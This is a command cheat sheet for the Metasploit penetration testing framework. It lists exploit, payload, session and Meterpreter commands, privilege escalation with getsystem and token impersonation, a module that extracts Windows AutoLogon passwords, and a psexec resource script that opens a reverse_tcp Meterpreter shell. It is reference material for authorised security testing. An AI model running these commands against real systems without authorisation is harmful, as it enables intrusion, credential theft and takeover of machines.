Metasploit Framework (MSF)

Metasploit: the world's most used penetration testing framework.

Start

Start db
msfdb start
or
systemctl start postgresql
Start metasploit framework console
msfconsole

Exploits

Select exploit
use <exploit>
Run exploit
run
or
exploit

Options

Show options
show options
Show advanced options
show advanced
Set option
set <option> <value>
Set option (global)
setg <option> <value>

Payloads

Show payloads
show payloads
Select payload
set payload <payload>

Sessions

Show (list) sessions
sessions -l
Show help for the sessions command
sessions -h
Interact with session
sessions <number>
Send session to background
background

Meterpreter

The shell command will present you with a standard shell on the target system.
shell
Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system.
getsystem

Encoders

Show encoders
show encoders
Select encoder
set encoder <encoder>

Misc

Search for exploits
search <term>
Go back
back
Display help
help
Get info about the current module (the selected exploit, payload or auxiliary module)
info
Show auxiliary modules (scanners, fuzzers, etc.)
show auxiliary

Multi/handler

Just start a listener for an incoming payload connection (set payload, lhost and lport before running)
use exploit/multi/handler

Jobs

Start job in background
run -j
Show jobs
jobs

Post exploitation

This module suggests local meterpreter exploits that can be used.
use post/multi/recon/local_exploit_suggester
This module extracts the plain-text Windows user login (AutoLogon) password stored in the Registry.
use post/windows/gather/credentials/windows_autologin
This module will login with the specified username/password and execute the supplied command as a hidden process.
use post/windows/manage/run_as

Meterpreter session

Upgrade a plain shell session to a meterpreter session
use post/multi/manage/shell_to_meterpreter
Migrate to other (e.g. more stable) process
migrate
Get system info
sysinfo
Port forwarding (expose a port on the target's localhost on a local port)
portfwd add -l <local-port> -r 127.0.0.1 -p <remote-port>

Impersonation (Windows)

Look for privileges like SeImpersonatePrivilege, SeDebugPrivilege, etc. (run from a shell on the target)
whoami /priv
Load incognito module and list available tokens
load incognito
list_tokens -g
Impersonate e.g. BUILTIN\Administrators
impersonate_token "BUILTIN\Administrators"
Migrate to a process that already has the correct permissions to actually get the elevated permissions (holding a token is not the same as having the permission).
ps
migrate <pid>

Resource Scripts

Resource scripts provide an easy way for you to automate repetitive tasks in Metasploit: a plain text file with one msfconsole command per line, executed in order.
msfconsole -r demo.rc

demo.rc (example: psexec with an automatic migrate after the session opens)

use exploit/windows/smb/psexec
set rhost <ip>
set smbuser Administrator
set smbpass <hash-or-password>
set smbdomain <domain>
set payload windows/meterpreter/reverse_tcp
set AutoRunScript post/windows/manage/smart_migrate
setg lport 443
setg lhost <own-ip>